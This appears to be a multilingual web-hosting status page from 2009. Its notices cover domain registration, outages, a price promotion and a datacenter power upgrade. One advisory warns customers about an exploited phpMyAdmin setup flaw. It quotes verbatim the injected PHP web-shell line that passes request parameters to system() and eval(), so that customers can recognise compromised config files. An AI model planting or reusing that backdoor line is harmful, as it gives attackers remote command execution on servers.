incubatec system status

Gentili Clienti,

nelle ultime ore stiamo riscontrando molti tentativi di exploit utilizzando un buco in phpMyAdmin. Nello specifico viene utilizzato un errore di verifica di una variabile in un file di configurazione auto-generato (percorso: config/config.inc.php) se si utilizza la routine di setup (percorso: scripts/setup.php) inclusa nel phpMyAdmin.

Consigliamo a tutti i Clienti che abbiano installato sul loro server dedicato oppure sul proprio spazio web phpMyAdmin di verificare e seguire i seguenti passi:

- effettuare una ricerca sul server e/o sullo spazio web del file “config.inc.php” e del file “setup.php”;
- se trovati, verificare se si tratta di files facenti parte di una installazione phpMyAdmin e che il percorso sia “config/config.inc.php” e “scripts/setup.php” (specialmente il file config.inc.php e’ soltanto pericolo se e’ stato generato in automatico dalla routine di setup; in questo caso normalmente si trova in config/config.inc.php) – non cancellate un file config.inc.php se non contiente la seguente stringa:

$cfg['Servers'][$i]['host']=''; if($_GET['c']){echo 'pre';system($_GET['c']);echo 'pre';}if($_GET['p']){echo 'pre';eval($_GET['p']);echo 'pre';};//'] = 'localhost';

(infatti e’ proprio questa stringa – notare come la variabile $_GET['c'] non viene verificata prima di essere passata al commando “system”! – che causa il problema di sicurezza!)
;
- in caso affermativo cancellare (dopo aver effettuato un eventuale backup di sicurezza) il file setup.php e config.inc.php;
- verificare sul sistema se siano stati installati rootkits o se ci siano molti tentativi di indovinare password e/o escalazione di privilegi;
- installare le versioni piu’ recenti di phpMyAdmin (e’ tuttavia necessario cancellare il file config.inc.php della vecchia installazione anche effettuando un UPGRADE!) direttamente dal sito di phpMyAdmin.net; per comodita’ abbiamo provveduto a scaricare le due versioni piu’ recenti e le rendiamo disponibili ai seguenti link:

Versione 2.11.9.5 per server con PHP versione 4.x:
http://217.70.146.62/phpMyAdmin-2.11.9.5-all-languages.tar.bz2

Version 3.2.0 per server con PHP versione 5.x:
http://217.70.146.62/phpMyAdmin-3.2.0-all-languages.tar.bz2

L’exploit in questione permette di eseguire commandi e scripts PHP con i privilegi del webserver, normalmente “apache”. Di seguito e’ possibile che l’hacker tenti di indovinare passwords di altri accounts e/o di escalare i privilegi guadagnando la root, oltre che ai soliti utilizzi del server per inviare SPAM e/o infettare altri servers.

Ringraziamo per l’attenzione. Su tutti i servers managed, shared-hosting e da noi gestiti la configurazione e’ ed era sicura e/o abbiamo gia’ provveduto ad apportare gli aggiornamenti necessari.

Per ulteriori domande e chiarimenti rimaniamo a Vs completa disposizione.

Cordiali saluti,
il Vs team server24

From 28 September 2009 it will be possible to register .it domain names in real time using our domain control-panels.

The publication of the new Regulations, approved by the Rules Committee of the Registro del ccTLD “it” on 5 June 2009, is the first step towards the start of the new synchronous registration system. For two years the synchronous system will work alongside the current asynchronous system.

To register, change, or cancel a .it domain simply use the domain control-panel or contact us. We are an accredited Registrar for .IT-domains and will be able to work directly on the domain database, with no need to send any paper documentation to the Registry.

For any further questions or clarifications do not hesitate to contact us; .IT-domain-registration and management will be activated automatically for all customers using the domain-control-panel (URL: http://domains.server24.eu/ ) with a prepaid debit-account.

Dal 28 settembre 2009 sarà possibile registrare i nomi a dominio .IT in tempo reale tramite i nostri pannelli di gestione domini.

La pubblicazione dei nuovi Regolamenti, approvati dalla Commissione Regole del Registro ccTLD “it” il 5 giugno u.s, è il primo passo per l’avvio del nuovo sistema di registrazione in modalità sincrona per domini .IT. Per due anni il sistema sincrono affiancherà senza sostituirla, la modalità di registrazione attuale (asincrona).

Per registrare, modificare, cancellare un dominio .it sarà sufficiente rivolgersi a noi oppure operare dal pannello di gestione domini. Siamo Registrar accreditato per domini .IT e a partire dal 28 settembre 2009 possiamo operare direttamente sul database dei domini .IT, senza che i Clienti debbiano piu’ inviare alcuna documentazione cartacea al Registro.

Per ulteriori chiarimenti e domande a riguardo non esitate a contattarci; la gestione dei domini .IT dal pannello di gestione domini verra’ abilitata in automatico per tutti i Clienti che ne fanno uso tramite conto prepagato (URL: http://domini.server24.it/ )

Due to an important security update all Windows VPS will be rebooted within the next minutes.
Per un aggiornamento di sicurezza importante tutte le VPS Windows saranno riavviate nei prossimi minuti.
Wegen eines wichtigen Sicherheits-Updates werden alle Window VPS in den nächsten Minuten neu gestartet.

UPDATE: Maintenance complete

Gentili Clienti,

al momento stiamo rilevando problemi di connettivita’ sulle linee Telecom Italia, inoltre il NOC Telecom Italia non sembra raggiungibile a causa di sciopero. Ci scusiamo per gli eventuali disagi, stiamo facendo il possibile, ma purtroppo non dipende da noi ed il nostro perimetro d’azione e’ limitato.

Gentili Clienti e Rivenditori,

questo mese non lasciateVi scappare i prezzi stracciati per la registrazione di domini .EU, .IN, .US, .TEL e .TV!

A partire dal 15 giugno 2009 approfittane:

- EURO 4,99 +IVA per registrazione dominio .EU

- EURO 4,99 +IVA per registrazione dominio .IN

- EURO 4,99 +IVA per registrazione dominio .US

- EURO 10,99 +IVA per registrazione dominio .TEL HOSTING INCLUSO!

- EURO 16,99 +IVA per registrazione dominio .TV

* Rinnovi e trasferimenti non sono compresi nella promozione.
* Non ci sono limiti al numero di domini registrabili.

L’offerta scade a fine mese! Contattateci per avere ulteriori informazioni.

We have successfully upgraded the UPS(“Uninterruptible Power Supply”)-facilities in the datacenter #2 so that now in the event of a power-outage the battery-systems can carry on for about 40 minutes. Normally the power-generators take over automatically max. 3 minutes after an outage, but if it is necessary to perform a manual-switchover the 40 minutes provide more time for doing this.

Abbiamo raddoppiato i sistemi UPS (“Uninterruptible Power Supply”) nel datacenter #2 in modo tale che nel caso di un calo/blackout corrente i sistemi a batteria abbiano autonomia per circa 40 minuti. Normalmente i generatori diesel entro 3 minuti si attivano in auotmatico, ma nel caso sia necessario effettuare un campio di gruppo manuale i 40 minuti saranno piu’ che sufficienti.

Die Erweiterung der USV-Anlage im Rechenzentrum #2 wurde heute erfolgreich abgeschlossen. Mit dieser Massnahme haben wir die Autonomiezeit im Falle eines Stromausfalls auf über 40 Minuten erhöht. Diese Massnahme ist aufgrund des Stromausfalls vom 24.05.09 ergriffen worden, da wir hiermit das Zeitfenster für eine manuelle Dieselzuschaltung deutlich erhöhen können. Für die automatische Dieselzuschaltung (maximal 3 Minuten nach Stromausfall) waren die bisherigen 20 Minuten vollkommen ausreichend.

disponibili da subito:
http://www.server24.it/serverdedicati.php

are avaiable now:
http://www.server24.eu/dedicated_servers.php